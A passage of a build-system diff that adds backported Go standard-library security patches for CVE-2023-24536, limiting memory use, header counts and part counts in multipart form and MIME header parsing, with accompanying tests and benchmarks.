+-// upcomingHeaderNewlines returns an approximation of the number of newlines
++var nl = []byte("\n")
++
++// upcomingHeaderKeys returns an approximation of the number of keys
+ // that will be in this header. If it gets confused, it returns 0.
+-func (r *Reader) upcomingHeaderNewlines() (n int) {
++func (r *Reader) upcomingHeaderKeys() (n int) {
+	// Try to determine the 'hint' size.
+	r.R.Peek(1) // force a buffer load if empty
+	s := r.R.Buffered()
+@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
+		return
+	}
+	peek, _ := r.R.Peek(s)
+-	for len(peek) > 0 {
+-		i := bytes.IndexByte(peek, '\n')
+-		if i < 3 {
+-			// Not present (-1) or found within the next few bytes,
+-			// implying we're at the end ("\r\n\r\n" or "\n\n")
+-			return
++	for len(peek) > 0 && n < 1000 {
++		var line []byte
++		line, peek, _ = bytes.Cut(peek, nl)
++		if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
++			// Blank line separating headers from the body.
++			break
++		}
++		if line[0] == ' ' || line[0] == '\t' {
++			// Folded continuation of the previous line.
++			continue
+		}
+		n++
+-		peek = peek[i+1:]
+	}
+-	return
++	return n
+ }
+
+ // CanonicalMIMEHeaderKey returns the canonical format of the
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3124d43..3ae0de1 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -9,6 +9,7 @@ import (
+	"bytes"
+	"io"
+	"reflect"
++	"runtime"
+	"strings"
+	"testing"
+ )
+@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
+	}
+ }
+
++// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
++// difficult to test well via the external API.
++func TestReaderUpcomingHeaderKeys(t *testing.T) {
++	for _, test := range []struct {
++		input string
++		want  int
++	}{{
++		input: "",
++		want:  0,
++	}, {
++		input: "A: v",
++		want:  1,
++	}, {
++		input: "A: v\r\nB: v\r\n",
++		want:  2,
++	}, {
++		input: "A: v\nB: v\n",
++		want:  2,
++	}, {
++		input: "A: v\r\n  continued\r\n  still continued\r\nB: v\r\n\r\n",
++		want:  2,
++	}, {
++		input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
++		want:  1,
++	}, {
++		input: "A: v" + strings.Repeat("\n", 1000),
++		want:  1,
++	}} {
++		r := reader(test.input)
++		got := r.upcomingHeaderKeys()
++		if test.want != got {
++			t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
++		}
++	}
++}
++
+ func TestReadMIMEHeaderNoKey(t *testing.T) {
+	r := reader(": bar\ntest-1: 1\n\n")
+	m, err := r.ReadMIMEHeader()
+@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
+	}
+ }
+
++// Test that reading a header doesn't overallocate. Issue 58975.
++func TestReadMIMEHeaderAllocations(t *testing.T) {
++	var totalAlloc uint64
++	const count = 200
++	for i := 0; i < count; i++ {
++		r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
++		var m1, m2 runtime.MemStats
++		runtime.ReadMemStats(&m1)
++		_, err := r.ReadMIMEHeader()
++		if err != nil {
++			t.Fatalf("ReadMIMEHeader: %v", err)
++		}
++		runtime.ReadMemStats(&m2)
++		totalAlloc += m2.TotalAlloc - m1.TotalAlloc
++	}
++	// 32k is large and we actually allocate substantially less,
++	// but prior to the fix for #58975 we allocated ~400k in this case.
++	if got, want := totalAlloc/count, uint64(32768); got > want {
++		t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
++	}
++}
++
+ type readResponseTest struct {
+	in       string
+	inCode   int
+--
+2.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
+From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 14:18:04 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
+ buffer allocations in ReadForm
+
+When copying form data to disk with io.Copy,
+allocate only one copy buffer and reuse it rather than
+creating two buffers per file (one from io.multiReader.WriteTo,
+and a second one from os.File.ReadFrom).
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go      | 15 +++++++--
+ src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+), 3 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index a7d4ca97f0484..975dcb6b26db4 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 			maxMemoryBytes = math.MaxInt64
+ 		}
+ 	}
++	var copyBuf []byte
+ 	for {
+ 		p, err := r.nextPart(false, maxMemoryBytes)
+ 		if err == io.EOF {
+@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 				}
+ 			}
+ 			numDiskFiles++
+-			size, err := io.Copy(file, io.MultiReader(&b, p))
++			if _, err := file.Write(b.Bytes()); err != nil {
++				return nil, err
++			}
++			if copyBuf == nil {
++				copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
++			}
++			// os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
++			type writerOnly struct{ io.Writer }
++			remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
+ 			if err != nil {
+ 				return nil, err
+ 			}
+ 			fh.tmpfile = file.Name()
+-			fh.Size = size
++			fh.Size = int64(b.Len()) + remainingSize
+ 			fh.tmpoff = fileOff
+-			fileOff += size
++			fileOff += fh.Size
+ 			if !combineFiles {
+ 				if err := file.Close(); err != nil {
+ 					return nil, err
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 5cded7170c6b8..f5b56083b2377 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ 		t.Fatalf("temp dir contains %v files; want 0", len(names))
+ 	}
+ }
++
++func BenchmarkReadForm(b *testing.B) {
++	for _, test := range []struct {
++		name string
++		form func(fw *Writer, count int)
++	}{{
++		name: "fields",
++		form: func(fw *Writer, count int) {
++			for i := 0; i < count; i++ {
++				w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++				fmt.Fprintf(w, "value %v", i)
++			}
++		},
++	}, {
++		name: "files",
++		form: func(fw *Writer, count int) {
++			for i := 0; i < count; i++ {
++				w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
++				fmt.Fprintf(w, "value %v", i)
++			}
++		},
++	}} {
++		b.Run(test.name, func(b *testing.B) {
++			for _, maxMemory := range []int64{
++				0,
++				1 << 20,
++			} {
++				var buf bytes.Buffer
++				fw := NewWriter(&buf)
++				test.form(fw, 10)
++				if err := fw.Close(); err != nil {
++					b.Fatal(err)
++				}
++				b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
++					b.ReportAllocs()
++					for i := 0; i < b.N; i++ {
++						fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++						form, err := fr.ReadForm(maxMemory)
++						if err != nil {
++							b.Fatal(err)
++						}
++						form.RemoveAll()
++					}
++
++				})
++			}
++		})
++	}
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
+From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 16:56:12 -0700
+Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
+ improve accounting of non-file data
+
+For requests containing large numbers of small parts,
+memory consumption of a parsed form could be about 250%
+over the estimated size.
+
+When considering the size of parsed forms, account for the size of
+FileHeader structs and increase the estimate of memory consumed by
+map entries.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go      |  9 +++--
+ src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
+ src/net/textproto/reader.go         |  8 ++++-
+ 3 files changed, 37 insertions(+), 35 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 975dcb6b26db4..3f6ff697ca608 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 		// Multiple values for the same key (one map entry, longer slice) are cheaper
+ 		// than the same number of values for different keys (many map entries), but
+ 		// using a consistent per-value cost for overhead is simpler.
++		const mapEntryOverhead = 200
+ 		maxMemoryBytes -= int64(len(name))
+-		maxMemoryBytes -= 100 // map overhead
++		maxMemoryBytes -= mapEntryOverhead
+ 		if maxMemoryBytes < 0 {
+ 			// We can't actually take this path, since nextPart would already have
+ 			// rejected the MIME headers for being too large. Check anyway.
+@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 		}
+ 
+ 		// file, store in memory or on disk
++		const fileHeaderSize = 100
+ 		maxMemoryBytes -= mimeHeaderSize(p.Header)
++		maxMemoryBytes -= mapEntryOverhead
++		maxMemoryBytes -= fileHeaderSize
+ 		if maxMemoryBytes < 0 {
+ 			return nil, ErrMessageTooLarge
+ 		}
+@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ 
+ func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++	size = 400
+ 	for k, vs := range h {
+ 		size += int64(len(k))
+-		size += 100 // map entry overhead
++		size += 200 // map entry overhead
+ 		for _, v := range vs {
+ 			size += int64(len(v))
+ 		}
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index f5b56083b2377..8ed26e0c34081 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
+ // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
+ // while processing non-file form data as well as file form data.
+ func TestReadForm_NonFileMaxMemory(t *testing.T) {
+-	n := 10<<20 + 25
+ 	if testing.Short() {
+-		n = 10<<10 + 25
++		t.Skip("skipping in -short mode")
+ 	}
++	n := 10 << 20
+ 	largeTextValue := strings.Repeat("1", n)
+ 	message := `--MyBoundary
+ Content-Disposition: form-data; name="largetext"
+@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
+ ` + largeTextValue + `
+ --MyBoundary--
+ `
+-
+ 	testBody := strings.ReplaceAll(message, "\n", "\r\n")
+-	testCases := []struct {
+-		name      string
+-		maxMemory int64
+-		err       error
+-	}{
+-		{"smaller", 50 + int64(len("largetext")) + 100, nil},
+-		{"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+-		{"too-large", 0, ErrMessageTooLarge},
+-	}
+-	for _, tc := range testCases {
+-		t.Run(tc.name, func(t *testing.T) {
+-			if tc.maxMemory == 0 && testing.Short() {
+-				t.Skip("skipping in -short mode")
+-			}
+-			b := strings.NewReader(testBody)
+-			r := NewReader(b, boundary)
+-			f, err := r.ReadForm(tc.maxMemory)
+-			if err == nil {
+-				defer f.RemoveAll()
+-			}
+-			if tc.err != err {
+-				t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+-			}
+-			if err == nil {
+-				if g := f.Value["largetext"][0]; g != largeTextValue {
+-					t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
+-				}
+-			}
+-		})
++	// Try parsing the form with increasing maxMemory values.
++	// Changes in how we account for non-file form data may cause the exact point
++	// where we change from rejecting the form as too large to accepting it to vary,
++	// but we should see both successes and failures.
++	const failWhenMaxMemoryLessThan = 128
++	for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
++		b := strings.NewReader(testBody)
++		r := NewReader(b, boundary)
++		f, err := r.ReadForm(maxMemory)
++		if err != nil {
++			continue
++		}
++		if g := f.Value["largetext"][0]; g != largeTextValue {
++			t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
++		}
++		f.RemoveAll()
++		if maxMemory < failWhenMaxMemoryLessThan {
++			t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
++		}
++		return
+ 	}
++	t.Errorf("ReadForm(x) failed for x < 1024, expect success")
+ }
+ 
+ // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 9a21777df8be0..c1284fde25eb7 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 
+ 	m := make(MIMEHeader, hint)
+ 
++	// Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
++	// Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
++	// MIMEHeaders average about 200 bytes per entry.
++	lim -= 400
++	const mapEntryOverhead = 200
++
+ 	// The first line cannot start with a leading space.
+ 	if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+ 		line, err := r.readLineSlice()
+@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 		vv := m[key]
+ 		if vv == nil {
+ 			lim -= int64(len(key))
+-			lim -= 100 // map entry overhead
++			lim -= mapEntryOverhead
+ 		}
+ 		lim -= int64(len(value))
+ 		if lim < 0 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
+From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
+
+The parsed forms of MIME headers and multipart forms can consume
+substantially more memory than the size of the input data.
+A malicious input containing a very large number of headers or
+form parts can cause excessively large memory allocations.
+
+Set limits on the size of MIME data:
+
+Reader.NextPart and Reader.NextRawPart limit the the number
+of headers in a part to 10000.
+
+Reader.ReadForm limits the total number of headers in all
+FileHeaders to 10000.
+
+Both of these limits may be set with with
+GODEBUG=multipartmaxheaders=<values>.
+
+Reader.ReadForm limits the number of parts in a form to 1000.
+This limit may be set with GODEBUG=multipartmaxparts=<value>.
+
+Thanks for Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go       | 19 ++++++++-
+ src/mime/multipart/formdata_test.go  | 61 ++++++++++++++++++++++++++++
+ src/mime/multipart/multipart.go      | 31 ++++++++++----
+ src/mime/multipart/readmimeheader.go |  2 +-
+ src/net/textproto/reader.go          | 19 +++++----
+ 5 files changed, 115 insertions(+), 17 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 216cccb..0b508ae 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -13,6 +13,7 @@ import (
+ 	"math"
+ 	"net/textproto"
+ 	"os"
++	"strconv"
+ )
+ 
+ // ErrMessageTooLarge is returned by ReadForm if the message form
+@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 	numDiskFiles := 0
+ 	multipartFiles := godebug.Get("multipartfiles")
+ 	combineFiles := multipartFiles != "distinct"
++	maxParts := 1000
++	multipartMaxParts := godebug.Get("multipartmaxparts")
++	if multipartMaxParts != "" {
++		if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
++			maxParts = v
++		}
++	}
++	maxHeaders := maxMIMEHeaders()
++
+ 	defer func() {
+ 		if file != nil {
+ 			if cerr := file.Close(); err == nil {
+@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 	}
+ 	var copyBuf []byte
+ 	for {
+-		p, err := r.nextPart(false, maxMemoryBytes)
++		p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
+ 		if err == io.EOF {
+ 			break
+ 		}
+ 		if err != nil {
+ 			return nil, err
+ 		}
++		if maxParts <= 0 {
++			return nil, ErrMessageTooLarge
++		}
++		maxParts--
+ 
+ 		name := p.FormName()
+ 		if name == "" {
+@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 		if maxMemoryBytes < 0 {
+ 			return nil, ErrMessageTooLarge
+ 		}
++		for _, v := range p.Header {
++			maxHeaders -= int64(len(v))
++		}
+ 		fh := &FileHeader{
+ 			Filename: filename,
+ 			Header:   p.Header,
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 8ed26e0..c78eeb7 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ 	}
+ }
+ 
++func TestReadFormLimits(t *testing.T) {
++	for _, test := range []struct {
++		values           int
++		files            int
++		extraKeysPerFile int
++		wantErr          error
++		godebug          string
++	}{
++		{values: 1000},
++		{values: 1001, wantErr: ErrMessageTooLarge},
++		{values: 500, files: 500},
++		{values: 501, files: 500, wantErr: ErrMessageTooLarge},
++		{files: 1000},
++		{files: 1001, wantErr: ErrMessageTooLarge},
++		{files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
++		{files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
++		{godebug: "multipartmaxparts=100", values: 100},
++		{godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
++		{godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
++		{godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
++	} {
++		name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
++		if test.godebug != "" {
++			name += fmt.Sprintf("/godebug=%v", test.godebug)
++		}
++		t.Run(name, func(t *testing.T) {
++			if test.godebug != "" {
++				t.Setenv("GODEBUG", test.godebug)
++			}
++			var buf bytes.Buffer
++			fw := NewWriter(&buf)
++			for i := 0; i < test.values; i++ {
++				w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++				fmt.Fprintf(w, "value %v", i)
++			}
++			for i := 0; i < test.files; i++ {
++				h := make(textproto.MIMEHeader)
++				h.Set("Content-Disposition",
++					fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
++				h.Set("Content-Type", "application/octet-stream")
++				for j := 0; j < test.extraKeysPerFile; j++ {
++					h.Set(fmt.Sprintf("k%v", j), "v")
++				}
++				w, _ := fw.CreatePart(h)
++				fmt.Fprintf(w, "value %v", i)
++			}
++			if err := fw.Close(); err != nil {
++				t.Fatal(err)
++			}
++			fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++			form, err := fr.ReadForm(1 << 10)
++			if err == nil {
++				defer form.RemoveAll()
++			}
++			if err != test.wantErr {
++				t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
++			}
++		})
++	}
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ 	for _, test := range []struct {
+ 		name string
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 958cef8..94464a8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -16,11 +16,13 @@ import (
+ 	"bufio"
+ 	"bytes"
+ 	"fmt"
++	"internal/godebug"
+ 	"io"
+ 	"io/ioutil"
+ 	"mime"
+ 	"mime/quotedprintable"
+ 	"net/textproto"
++	"strconv"
+ 	"strings"
+ )
+ 
+@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ 	return n, r.err
+ }
+ 
+-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ 	bp := &Part{
+ 		Header: make(map[string][]string),
+ 		mr:     mr,
+ 	}
+-	if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
++	if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
+ 		return nil, err
+ 	}
+ 	bp.r = partReader{bp}
+@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ 	return bp, nil
+ }
+ 
+-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
+ 	r := textproto.NewReader(bp.mr.bufReader)
+-	header, err := readMIMEHeader(r, maxMIMEHeaderSize)
++	header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
+ 	if err == nil {
+ 		bp.Header = header
+ 	}
+@@ -306,6 +308,19 @@ type Reader struct {
+ // including header keys, values, and map overhead.
+ const maxMIMEHeaderSize = 10 << 20
+ 
++func maxMIMEHeaders() int64 {
++	// multipartMaxHeaders is the maximum number of header entries NextPart will return,
++	// as well as the maximum combined total of header entries Reader.ReadForm will return
++	// in FileHeaders.
++	multipartMaxHeaders := godebug.Get("multipartmaxheaders")
++	if multipartMaxHeaders != "" {
++		if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
++			return v
++		}
++	}
++	return 10000
++}
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+-	return r.nextPart(false, maxMIMEHeaderSize)
++	return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+ 
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+-	return r.nextPart(true, maxMIMEHeaderSize)
++	return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+ 
+-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ 	if r.currentPart != nil {
+ 		r.currentPart.Close()
+ 	}
+@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
+ 
+ 		if r.isBoundaryDelimiterLine(line) {
+ 			r.partsRead++
+-			bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
++			bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
+ 			if err != nil {
+ 				return nil, err
+ 			}
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+index 6836928..25aa6e2 100644
+--- a/src/mime/multipart/readmimeheader.go
++++ b/src/mime/multipart/readmimeheader.go
+@@ -11,4 +11,4 @@ import (
+ // readMIMEHeader is defined in package net/textproto.
+ //
+ //go:linkname readMIMEHeader net/textproto.readMIMEHeader
+-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
++func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 1c79f0a..ad2d777 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ //	}
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+-	return readMIMEHeader(r, math.MaxInt64)
++	return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
+ }
+ 
+ // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
+ // It is called by the mime/multipart package.
+-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
++func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
+ 	// Avoid lots of small slice allocations later by allocating one
+ 	// large one ahead of time which we'll cut up into smaller
+ 	// slices. If this isn't big enough later, we allocate small ones.
+@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 	// Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
+ 	// Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
+ 	// MIMEHeaders average about 200 bytes per entry.
+-	lim -= 400
++	maxMemory -= 400
+ 	const mapEntryOverhead = 200
+ 
+ 	// The first line cannot start with a leading space.
+@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 			continue
+ 		}
+ 
++		maxHeaders--
++		if maxHeaders < 0 {
++			return nil, errors.New("message too large")
++		}
++
+ 		// backport 5c55ac9bf1e5f779220294c843526536605f42ab
+ 		//
+ 		// value is computed as
+@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ 
+ 		vv := m[key]
+ 		if vv == nil {
+-			lim -= int64(len(key))
+-			lim -= mapEntryOverhead
++			maxMemory -= int64(len(key))
